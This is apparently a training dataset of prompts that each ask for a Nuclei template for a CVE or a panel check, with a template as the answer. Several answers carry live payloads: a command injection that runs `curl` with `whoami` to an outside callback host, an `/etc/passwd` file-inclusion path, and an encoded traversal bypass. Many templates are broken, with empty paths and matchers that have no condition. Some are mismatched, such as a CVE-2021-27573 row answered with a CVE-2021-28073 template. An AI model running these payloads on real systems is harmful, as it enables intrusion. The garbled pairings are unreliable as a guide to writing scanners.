instruction
stringlengths 41
188
| input
stringlengths 165
3.12k
| output
stringlengths 256
2.26M
| category
stringclasses 3
values | severity
stringclasses 5
values | id
stringlengths 5
54
|
|---|---|---|---|---|---|
Generate a Nuclei template for CVE-2020-11710
|
Title: Unknown Vulnerability in konghq docker-kong
Summary: An issue was discovered in docker-kong (for Kong) through 2.0.3. The admin API port may be accessible on interfaces other than 127.0.0.1. NOTE: The vendor argue that this CVE is not a vulnerability because it has an inaccurate bug scope and patch links. “1) Inaccurate Bug Scope - The issue scope was on Kong's docker-compose template, and not Kong's docker image itself. In reality, this issue is not associated with any version of the Kong gateway. As such, the description stating ‘An issue was discovered in docker-kong (for Kong) through 2.0.3.’ is incorrect. This issue only occurs if a user decided to spin up Kong via docker-compose without following the security documentation. The docker-compose template is meant for users to quickly get started with Kong, and is meant for development purposes only. 2) Incorrect Patch Links - The CVE currently points to a documentation improvement as a “Patch” link: https://github.com/Kong/docs.konghq.com/commit/d693827c32144943a2f45abc017c1321b33ff611.This link actually points to an improvement Kong Inc made for fool-proofing. However, instructions for how to protect the admin API were already well-documented here: https://docs.konghq.com/2.0.x/secure-admin-api/#network-layer-access-restrictions , which was first published back in 2017 (as shown in this commit: https://github.com/Kong/docs.konghq.com/commit/e99cf875d875dd84fdb751079ac37882c9972949) Lastly, the hyperlink to https://github.com/Kong/kong (an unrelated Github Repo to this issue) on the Hyperlink list does not include any meaningful information on this topic.
Vulnerability Type: Unknown Vulnerability
Severity: critical
Affected Products: konghq docker-kong
Indicators: error, vulnerability detected
|
id: CVE-2020-11710
info:
name: Kong Admin <=2.03 - Admin API Access
author: pikpikcu
severity: critical
description: Kong Admin through 2.0.3 contains an issue via docker-kong which makes the admin API port accessible on interfaces other than 127.0.0.1.
tags: cve,cve2020,kong,konghq,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/admin/"
matchers:
- type: word
words:
- "Welcome to kong"
- "configuration"
- "kong_env"
part: body
condition: and
- type: status
status:
- 200
|
cve
|
critical
|
CVE-2020-11710
|
Generate a Nuclei template for: Detect Springboot Trace Actuator
|
Title: Detect Springboot Trace Actuator
Summary: Detect Springboot Trace Actuator. View recent HTTP requests and responses
Vulnerability Type: Security Check
Severity: low
Indicators: vulnerability detected
|
id: springboot-trace
info:
name: Detect Springboot Trace Actuator
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: View recent HTTP requests and responses
tags: misconfig,springboot,exposure,vuln
http:
- method: GET
path:
- "{{BaseURL}}/trace"
matchers:
- type: word
words:
- ""timestamp""
- ""info""
- ""method""
- ""path""
part: body
condition: and
- type: word
words:
- "application/json"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
- "application/vnd.spring-boot.actuator.v2+json"
- "application/vnd.spring-boot.actuator.v3+json"
part: header
condition: or
- type: status
status:
- 200
|
generic
|
low
|
springboot-trace
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: hackster
info:
name: Hackster User Name Information - Detect
author: dwisiswant0
severity: info
description: Hackster user name information check was conducted.
tags: osint,osint-coding,hackster,discovery
http:
- method: GET
path:
- "https://www.hackster.io/{{user}}"
matchers:
- type: status
status:
- 200
- type: word
words:
- "- Hackster.io"
part: body
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for: Azure PostgreSQL Log Disconnections Not Enabled
|
Title: Azure PostgreSQL Log Disconnections Not Enabled
Summary: Azure PostgreSQL Log Disconnections Not Enabled. Ensure that the "log_disconnections" server parameter is enabled for all PostgreSQL database servers provisioned in your Microsoft Azure cloud account. The "log_disconnections" parameter enables the logging of session termination. The log output provides information similar to the one generated by the "log_connections" parameter, plus the duration of the session. Only Azure account admins can change this parameter at the session start, and it cann
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: azure-postgres-log-disconnections-disabled
info:
name: Azure PostgreSQL Log Disconnections Not Enabled
author: princechaddha
severity: medium
description: Ensure that the "log_disconnections" server parameter is enabled for all PostgreSQL database servers provisioned in your Microsoft Azure cloud account. The "log_disconnections" parameter enables the logging of session termination. The log output provides information similar to the one generated by the "log_connections" parameter, plus the duration of the session. Only Azure account admins can change this parameter at the session start, and it cannot be changed at all during a session.
tags: cloud,devops,azure,microsoft,postgresql,azure-cloud-config
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
medium
|
azure-postgres-log-disconnections-disabled
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: workspace-one-uem
info:
name: VMware Workspace ONE UEM Airwatch Login Panel - Detect
author: gevakun,hanlaomo
severity: info
description: VMware Workspace ONE UEM Airwatch login panel was detected.
tags: panel,workspaceone,vmware,discovery
http:
- method: GET
path:
- "{{BaseURL}}/AirWatch/Login"
matchers:
- type: word
words:
- "About VMware AirWatch"
- "content="AirWatch"
- "/AirWatch/Images"
part: body
condition: or
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for: Jolokia - Searching MBeans
|
Title: Jolokia - Searching MBeans
Summary: Jolokia - Searching MBeans. Unauth users can search Mbeans in Jolokia.
Vulnerability Type: Security Check
Severity: low
Indicators: vulnerability detected
|
id: jolokia-mbean-search
info:
name: Jolokia - Searching MBeans
author: pussycat0x
severity: low
description: Unauth users can search Mbeans in Jolokia.
tags: jolokia,springboot,mbean,tomcat,misconfig,vuln
http:
- method: GET
path:
- "{{BaseURL}}/jolokia/search/*:test=test"
- "{{BaseURL}}/actuator/jolokia/search/*:test=test"
matchers:
- type: status
status:
- 200
- type: word
words:
- ""type":"search""
- ""value":"
part: body
condition: and
|
generic
|
low
|
jolokia-mbean-search
|
Generate a Nuclei template for: Vaultwarden Login Panel - Detect
|
Title: Vaultwarden Login Panel - Detect
Summary: Vaultwarden Login Panel - Detect. Vaultwarden products was detected.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: vaultwarden-panel
info:
name: Vaultwarden Login Panel - Detect
author: righettod
severity: info
description: Vaultwarden products was detected.
tags: panel,vaultwarden,login,discovery
http:
- method: GET
path:
- "{{BaseURL}}/#/login"
matchers:
- type: dsl
condition: and
|
generic
|
info
|
vaultwarden-panel
|
Generate a Nuclei template for: MySQL - Default Login
|
Title: MySQL - Default Login
Summary: MySQL - Default Login. A MySQL service was accessed with easily guessed credentials.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: mysql-default-login
info:
name: MySQL - Default Login
author: DhiyaneshDk,pussycat0x,ritikchaddha
severity: high
description: A MySQL service was accessed with easily guessed credentials.
tags: js,mysql,default-login,network,fuzz,enum,vuln
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
high
|
mysql-default-login
|
Generate a Nuclei template for: Umami Panel - Detect
|
Title: Umami Panel - Detect
Summary: Umami Panel - Detect. simple, fast, privacy-focused, open-source analytics solution.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: umami-panel
info:
name: Umami Panel - Detect
author: userdehghani
severity: info
description: simple, fast, privacy-focused, open-source analytics solution.
tags: panel,umami,login,detect,discovery
http:
- method: GET
path:
- "{{BaseURL}}/login"
- "{{BaseURL}}/favicon.ico"
matchers:
- type: dsl
condition: or
- method: GET
path:
- "{{BaseURL}}/~404"
matchers:
- type: status
status:
- 200
|
generic
|
info
|
umami-panel
|
Generate a Nuclei template for: SEO King - Shopify App — Installer
|
Title: SEO King - Shopify App — Installer
Summary: SEO King - Shopify App — Installer. Shopify App is susceptible to the Installation page exposure due to misconfiguration.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: shopify-app-installer
info:
name: SEO King - Shopify App — Installer
author: tess
severity: info
description: Shopify App is susceptible to the Installation page exposure due to misconfiguration.
tags: misconfig,shopify,install,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "Shopify App — Installation"
- "example.myshopify.com"
part: body
condition: and
- type: status
status:
- 200
|
generic
|
info
|
shopify-app-installer
|
Generate a Nuclei template for CVE-2024-29059
|
Title: Vulnerability (CWE-209) in microsoft .net_framework
Summary: .NET Framework Information Disclosure Vulnerability
Vulnerability Type: Vulnerability (CWE-209)
Severity: high
Affected Products: microsoft .net_framework
Indicators: error, vulnerability detected
|
id: CVE-2024-29059
info:
name: .NET Framework - Leaking ObjRefs via HTTP .NET Remoting
author: iamnoooob,rootxharsh,DhiyaneshDk,pdresearch
severity: high
description: .NET Framework Information Disclosure Vulnerability
tags: cve,cve2024,dotnet,microsoft,remoting,deserialization,kev,vkev,vuln
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
|
cve
|
high
|
CVE-2024-29059
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: lichess
info:
name: Lichess User Name Information - Detect
author: dwisiswant0
severity: info
description: Lichess user name information check was conducted.
tags: osint,osint-gaming,lichess,discovery
http:
- method: GET
path:
- "https://lichess.org/@/{{user}}"
matchers:
- type: status
status:
- 200
- type: word
words:
- "Activity"
part: body
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: epmp-login
info:
name: ePMP 2000 Login Panel - Detect
author: dhiyaneshDk
severity: info
description: ePMP 2000 login panel was detected.
tags: panel,edb,iot,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "<title>ePMP</title>"
part: body
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for CVE-2023-26802
|
Title: Path Traversal in dcnglobal dcbi-netlog-lab_firmware
Summary: An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.
Vulnerability Type: Path Traversal
Severity: critical
Affected Products: dcnglobal dcbi-netlog-lab_firmware
Indicators: error, vulnerability detected
|
id: CVE-2023-26802
info:
name: DCBI-Netlog-LAB v1.0 - Command Injection
author: pussycat0x
severity: critical
description: An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.
tags: cve,cve2023,rce,unauth,netlog,vkev,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "nsg_bridge.cgi"
- "nsg_dhcpactiveip.cgi"
part: body_2
condition: and
- type: status
status:
- 200
|
cve
|
critical
|
CVE-2023-26802
|
Generate a Nuclei template for: dizqueTV - Detect
|
Title: dizqueTV - Detect
Summary: dizqueTV - Detect. An instance running dizqueTV was detected.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: dizquetv-detect
info:
name: dizqueTV - Detect
author: s4e-io
severity: info
description: An instance running dizqueTV was detected.
tags: dizquetv,tech,detect,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
condition: and
|
generic
|
info
|
dizquetv-detect
|
Generate a Nuclei template for: Apache YARN ResourceManager Panel - Detect
|
Title: Apache YARN ResourceManager Panel - Detect
Summary: Apache YARN ResourceManager Panel - Detect. Apache YARN ResourceManager panel was detected.
Vulnerability Type: Security Check
Severity: low
Indicators: vulnerability detected
|
id: yarn-manager-exposure
info:
name: Apache YARN ResourceManager Panel - Detect
author: pdteam
severity: low
description: Apache YARN ResourceManager panel was detected.
tags: panel,apache,yarn,exposure,discovery
http:
- method: GET
path:
- "{{BaseURL}}/cluster/cluster"
matchers:
- type: word
words:
- "hadoop"
- "resourcemanager"
- "logged in as: dr.who"
condition: and
|
generic
|
low
|
yarn-manager-exposure
|
Generate a Nuclei template for: RD Web Access Panel - Detect
|
Title: RD Web Access Panel - Detect
Summary: RD Web Access Panel - Detect. RD web access panel was discovered.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: rdweb-panel
info:
name: RD Web Access Panel - Detect
author: rxerium,sorrowx3
severity: info
description: RD web access panel was discovered.
tags: panel,login,rdp,web-access,Microsoft,detect,microsoft,discovery
http:
- method: GET
path:
- "{{BaseURL}}/RDWeb/"
matchers:
- type: word
words:
- "TSWAFeatureCheckCookie=true; path=/RDWeb/"
part: header
- type: word
words:
- "<rdp-client-top-view>"
- "Microsoft Remote Desktop"
part: response
condition: and
|
generic
|
info
|
rdweb-panel
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: discourse
info:
name: Discourse User Name Information - Detect
author: dwisiswant0
severity: info
description: Discourse user name information check was conducted.
tags: osint,osint-misc,discourse,discovery
http:
- method: GET
path:
- "https://meta.discourse.org/u/{{user}}/summary.json"
matchers:
- type: status
status:
- 200
- type: word
words:
- "topics"
part: body
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for: Bonita Portal Login - Detect
|
Title: Bonita Portal Login - Detect
Summary: Bonita Portal Login - Detect. Detects the presence of Bonita Portal login page.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: bonita-portal-panel
info:
name: Bonita Portal Login - Detect
author: DhiyaneshDK
severity: info
description: Detects the presence of Bonita Portal login page.
tags: bonita,login,panel,discovery
http:
- method: GET
path:
- "{{BaseURL}}/bonita/login.jsp"
matchers:
- type: word
words:
- "Bonita Portal"
- type: status
status:
- 200
|
generic
|
info
|
bonita-portal-panel
|
Generate a Nuclei template for CVE-2009-3053
|
Title: Path Traversal in jvitals com_agora
Summary: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
Vulnerability Type: Path Traversal
Severity: medium
Affected Products: jvitals com_agora
Indicators: error, vulnerability detected
|
id: CVE-2009-3053
info:
name: Joomla! Agora 3.0.0b - Local File Inclusion
author: daffainfo
severity: medium
description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
tags: cve2009,cve,joomla,lfi,edb,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
matchers:
- type: regex
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2009-3053
|
Generate a Nuclei template for CVE-2021-33357
|
Title: OS Command Injection in raspap raspap
Summary: A vulnerability exists in RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.
Vulnerability Type: OS Command Injection
Severity: critical
Affected Products: raspap raspap
Indicators: error, vulnerability detected
|
id: CVE-2021-33357
info:
name: RaspAP <=2.6.5 - Remote Command Injection
author: pikpikcu,pdteam
severity: critical
description: RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";".
tags: cve2021,cve,rce,raspap,oast,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"
matchers:
- type: word
words:
- "http"
part: interactsh_protocol
- type: word
words:
- "DHCPEnabled"
|
cve
|
critical
|
CVE-2021-33357
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: sap-successfactors-detect
info:
name: SAP SuccessFactors Login Panel - Detect
author: tess
severity: info
description: SAP SuccessFactors login panel was detected.
tags: panel,sap,detect,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/sf/start"
matchers:
- type: word
words:
- "SAP SuccessFactors"
- "sap-ui-core"
part: body
condition: and
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for CVE-2025-25034
|
Title: Deserialization of Untrusted Data in CVE-2025-25034
Summary: A PHP object injection vulnerability exists in SugarCRM versions prior to 6.5.24, 6.7.13, 7.5.2.5, 7.6.2.2, and 7.7.1.0 due to improper validation of PHP serialized input in the SugarRestSerialize.php script. The vulnerable code fails to sanitize the rest_data parameter before passing it to the unserialize() function. This allows an unauthenticated attacker to submit crafted serialized data containing malicious object declarations, resulting in arbitrary code execution within the application context. Although SugarCRM released a prior fix in advisory sugarcrm-sa-2016-001, the patch was incomplete and failed to address some vectors.
Vulnerability Type: Deserialization of Untrusted Data
Severity: medium
Indicators: failed
|
id: CVE-2025-25034
info:
name: SugarCRM - Unauthenticated Remote Code Execution via PHP Object Injection
author: Redmomn
severity: critical
description: A PHP object injection vulnerability exists in SugarCRM versions prior to 6.5.24, 6.7.13, 7.5.2.5, 7.6.2.2, and 7.7.1.0 due to improper validation of PHP serialized input in the SugarRestSerialize.php script. The vulnerable code fails to sanitize the rest_data parameter before passing it to the unserialize() function. This allows an unauthenticated attacker to submit crafted serialized data containing malicious object declarations, resulting in arbitrary code execution within the application context. Although SugarCRM released a prior fix in advisory sugarcrm-sa-2016-001, the patch was incomplete and failed to address some vectors.
tags: cve,cve2025,sugarcrm,rce,php,deserialization,unauth,vkev,vuln
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
- method: GET
path:
matchers:
- type: dsl
condition: and
|
cve
|
medium
|
CVE-2025-25034
|
Generate a Nuclei template for: ThinkPHP 5.0.23 - Remote Code Execution
|
Title: ThinkPHP 5.0.23 - Remote Code Execution
Summary: ThinkPHP 5.0.23 - Remote Code Execution. ThinkPHP 5.0.23 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Vulnerability Type: Security Check
Severity: critical
Indicators: vulnerability detected
|
id: thinkphp-5023-rce
info:
name: ThinkPHP 5.0.23 - Remote Code Execution
author: dr_set
severity: critical
description: ThinkPHP 5.0.23 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
tags: thinkphp,rce,vuln
http:
- method: POST
path:
- "{{BaseURL}}/index.php?s=captcha"
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
- "ThinkPHP"
condition: and
- type: status
status:
- 200
|
generic
|
critical
|
thinkphp-5023-rce
|
Generate a Nuclei template for: Pinata API Key - Expose
|
Title: Pinata API Key - Expose
Summary: Pinata API Key - Expose. Tags: pinata, exposure, api-keys
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: pinata-api-key
info:
name: Pinata API Key - Expose
author: 0xpugal
severity: info
description: Pinata API Key - Expose
tags: pinata,exposure,api-keys,tokens,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "pinata_api_key"
- "pinata_api_secret"
- "pinataKey"
- "pinataSecret"
- "pinata-key"
- "pinata_secret"
condition: or
|
generic
|
info
|
pinata-api-key
|
Generate a Nuclei template for CVE-2023-30019
|
Title: Vulnerability (CWE-918) in evilmartians imgproxy
Summary: imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.
Vulnerability Type: Vulnerability (CWE-918)
Severity: medium
Affected Products: evilmartians imgproxy
Indicators: error, vulnerability detected
|
id: CVE-2023-30019
info:
name: Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)
author: DhiyaneshDK
severity: medium
description: imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.
tags: cve,cve2023,imgproxy,ssrf,oast,evilmartians,vuln
http:
- method: GET
path:
- "{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"
matchers:
- type: word
words:
- "Invalid source image"
- type: status
status:
- 422
|
cve
|
medium
|
CVE-2023-30019
|
Generate a Nuclei template for CVE-2017-8046
|
Title: Vulnerability (CWE-20) in vmware spring_boot and others
Summary: Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java code.
Vulnerability Type: Vulnerability (CWE-20)
Severity: critical
Affected Products: vmware spring_boot, pivotal_software spring_data_rest
Indicators: error, vulnerability detected
|
id: CVE-2017-8046
info:
name: Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
author: domwhewell-sage
severity: critical
description: Spring Data REST < 2.6.9 and 3.0.1, Spring Boot < 1.5.9 and 2.0 M6 contain a remote code execution caused by processing malicious PATCH requests with crafted JSON data, letting attackers execute arbitrary Java code, exploit requires sending malicious PATCH requests.
tags: cve,cve2017,pivotal,springboot,pivotal_software,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "application/json"
- "application/hal+json"
- "application/vnd.spring-boot.actuator"
part: header
condition: or
- type: word
words:
- ""_embedded""
- ""_links""
- ""page""
- ""size""
part: body
condition: or
- method: PATCH
path:
- "{{endpoint}}/1"
matchers:
- type: word
words:
- "dns"
part: interactsh_protocol
- type: word
words:
- "org.springframework"
part: body
|
cve
|
critical
|
CVE-2017-8046
|
Generate a Nuclei template for CVE-2020-12256
|
Title: Cross-Site Scripting (XSS) in rconfig rconfig
Summary: rConfig 3.9.4 is vulnerable to reflected XSS. The devicemgmnt.php file improperly validates user input. An attacker can exploit this by crafting arbitrary JavaScript in the deviceId GET parameter to devicemgmnt.php.
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: medium
Affected Products: rconfig rconfig
Indicators: error, vulnerability detected
|
id: CVE-2020-12256
info:
name: rConfig 3.9.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript.
tags: cve,cve2020,rconfig,authenticated,xss,vuln
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
|
cve
|
medium
|
CVE-2020-12256
|
Generate a Nuclei template for CVE-2022-43167
|
Title: Cross-Site Scripting (XSS) in rukovoditel rukovoditel
Summary: A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add".
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: medium
Affected Products: rukovoditel rukovoditel
Indicators: error, vulnerability detected
|
id: CVE-2022-43167
info:
name: Rukovoditel <= 3.2.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add".
tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated,vuln
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
|
cve
|
medium
|
CVE-2022-43167
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: ems-login-panel
info:
name: EMS Login Panel - Detect
author: __Fazal
severity: info
description: EMS login panel was detected.
tags: panel,ems,login,discovery
http:
- method: GET
path:
- "{{BaseURL}}/EMSWebClient/Login.aspx"
matchers:
- type: status
status:
- 200
- type: word
words:
- "EMS Web Client - Login"
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for CVE-2021-27573
|
Title: Missing Authorization in remotemouse emote_remote_mouse
Summary: An issue was discovered in Emote Remote Mouse through 4.0.0.0. Remote unauthenticated users can execute arbitrary code via crafted UDP packets with no prior authorization or authentication.
Vulnerability Type: Missing Authorization
Severity: critical
Affected Products: remotemouse emote_remote_mouse
Indicators: error, vulnerability detected
|
id: CVE-2021-28073
info:
name: Ntopng Authentication Bypass
author: z3bd
severity: critical
description: Ntopng, a passive network monitoring tool, contains an authentication bypass vulnerability in ntopng <= 4.2
tags: cve2021,cve,ntopng,vuln
http:
- method: GET
path:
- "{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css"
- "{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"
matchers:
- type: word
words:
- "application/json"
part: header
- type: word
words:
- ""results":"
- ""name":"
- ""tab":"
condition: and
- type: status
status:
- 200
|
cve
|
critical
|
CVE-2021-27573
|
Generate a Nuclei template for CVE-2023-5974
|
Title: Vulnerability (CWE-918) in wpb_show_core_project wpb_show_core
Summary: The WPB Show Core WordPress plugin through 2.2 is vulnerable to server-side request forgery (SSRF) via the `path` parameter.
Vulnerability Type: Vulnerability (CWE-918)
